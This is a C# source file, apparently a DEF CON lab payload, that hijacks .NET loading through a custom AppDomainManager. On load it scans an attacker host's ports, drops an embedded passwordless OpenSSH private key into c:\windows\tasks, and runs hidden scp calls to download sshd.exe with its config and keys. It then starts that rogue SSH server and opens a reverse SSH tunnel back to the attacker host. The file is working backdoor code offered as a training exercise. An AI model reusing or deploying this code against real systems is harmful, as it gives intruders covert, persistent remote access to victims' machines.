﻿using System;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
using System.Collections.Generic;

public sealed class MyAppDomainManager : AppDomainManager
{
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        SaveFiles.Begin();

        return;
    }
}
public class SaveFiles
{
    public static int CheckPorts(string sshHost,int port)
    {
        

        var timeout = 100;
        var result = false;
        int noPort = 1337;

            using (var client = new TcpClient())
            {
                try
                {
                    client.ReceiveTimeout = timeout * 1000;
                    client.SendTimeout = timeout * 1000;
                    var asyncResult = client.BeginConnect(sshHost, port, null, null);
                    var waitHandle = asyncResult.AsyncWaitHandle;
                    try
                    {
                        if (!asyncResult.AsyncWaitHandle.WaitOne(TimeSpan.FromSeconds(timeout), false))
                        {
                            // wait handle didn't came back in time
                            client.Close();
                        }
                        else
                        {
                            // The result was positive
                            result = client.Connected;
                            if (result == true)
                            {
                                return port;
                            } else
                            {
                                return noPort;
                            }                            
                        }
                        // Close
                        client.EndConnect(asyncResult);
                    }
                    finally
                    {
                        // Close
                        waitHandle.Close();
                    }
                }
                catch
                { }
            }

        return noPort;
    }
    public static void Begin()
    {
        // Host to copy files from. Replace with your DEF CON Ubuntu VM we provided. Hint: "ifconfig ens33" on your VM
        string sshHost = "192.168.201.128";
        // Build our list of ports to check
        int portTest;
        List<int> ports = new List<int>(2);
        ports.Add(22);
        ports.Add(443);
        ports.Add(80);
        ports.Add(53);
        ports.Add(31337);
        List<int> openPorts = new List<int>();
        foreach (int p in ports)
        {
            // Call CheckPorts() and perform a connection test
            portTest = CheckPorts(sshHost,p);
            // Add the port result to a variable
            openPorts.Add(portTest);
        }
        // Attempt to connect to using open ports
        try
        {
            // SSH Key with No Password. SSH to a user with no shell. Do not replace. Otherwise, you'll need to add your pub key to authorized_keys on the VM
            string[] key = { "-----BEGIN OPENSSH PRIVATE KEY-----", "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", "-----END OPENSSH PRIVATE KEY-----", "" };
        
            // Path to drop ssh key 
            var taskPath = @"c:\\windows\\tasks\\";
            string userName = "user";
            string keyName = "key.pem";
            // Save ssh key to disk
            using (StreamWriter outputFile = new StreamWriter(Path.Combine(taskPath, $"{keyName}")))
            {
                foreach (string line in key)
                    outputFile.WriteLine(line);
            }
            // Copy sshd
            string appdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
            Process process = new Process();
            process.StartInfo.FileName = "c:\\windows\\system32\\OpenSSH\\scp.exe";
            process.StartInfo.Arguments = $"-o StrictHostKeyChecking=no -P {openPorts[0]} -i c:\\windows\\tasks\\{keyName} {userName}@{sshHost}:/home/{userName}/sshd.exe {taskPath}\\sshd.exe";
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.Start();
            process.WaitForExit();

            //Copy config
            Process process2 = new Process();
            process2.StartInfo.FileName = "c:\\windows\\system32\\OpenSSH\\scp.exe";
            process2.StartInfo.Arguments = $"-o StrictHostKeyChecking=no -P {openPorts[0]} -i c:\\windows\\tasks\\{keyName} {userName}@{sshHost}:/home/{userName}/sshd_config {taskPath}\\sshd_config";
            process2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process2.Start();
            process2.WaitForExit();

            // Copy Host Key
            Process process3 = new Process();
            process3.StartInfo.FileName = "c:\\windows\\system32\\OpenSSH\\scp.exe";
            process3.StartInfo.Arguments = $"-o StrictHostKeyChecking=no -P {openPorts[0]} -i c:\\windows\\tasks\\{keyName} {userName}@{sshHost}:/home/{userName}/ssh_host_rsa_key {taskPath}\\ssh_host_rsa_key";
            process3.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process3.Start();
            process3.WaitForExit();

            //Copy Authorized_Keys
            Process process4 = new Process();
            process4.StartInfo.FileName = "c:\\windows\\system32\\OpenSSH\\scp.exe";
            process4.StartInfo.Arguments = $"-o StrictHostKeyChecking=no -P {openPorts[0]} -i c:\\windows\\tasks\\{keyName} {userName}@{sshHost}:/home/{userName}/authorized_keys {taskPath}\\authorized_keys";
            process4.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 
            process4.Start();
            process4.WaitForExit();

            //Start SSH Server
            Process process5 = new Process();
            process5.StartInfo.FileName = $"{taskPath}\\sshd.exe";
            process5.StartInfo.Arguments = $"-h {taskPath}\\ssh_host_rsa_key -f {taskPath}\\sshd_config";
            process5.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process5.Start();
            
            // Connect back
            Process process6 = new Process();
            process6.StartInfo.FileName = "c:\\windows\\system32\\OpenSSH\\ssh.exe";
            process6.StartInfo.Arguments = $"-o StrictHostKeyChecking=no -p {openPorts[0]} -i c:\\windows\\tasks\\{keyName} {userName}@{sshHost} -R 9052 -R 31337:127.0.0.1:31337 -N";
            process6.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process6.Start();
            process6.WaitForExit();

        } catch
        {
            Console.WriteLine("DEF CON");
        }

    }
}

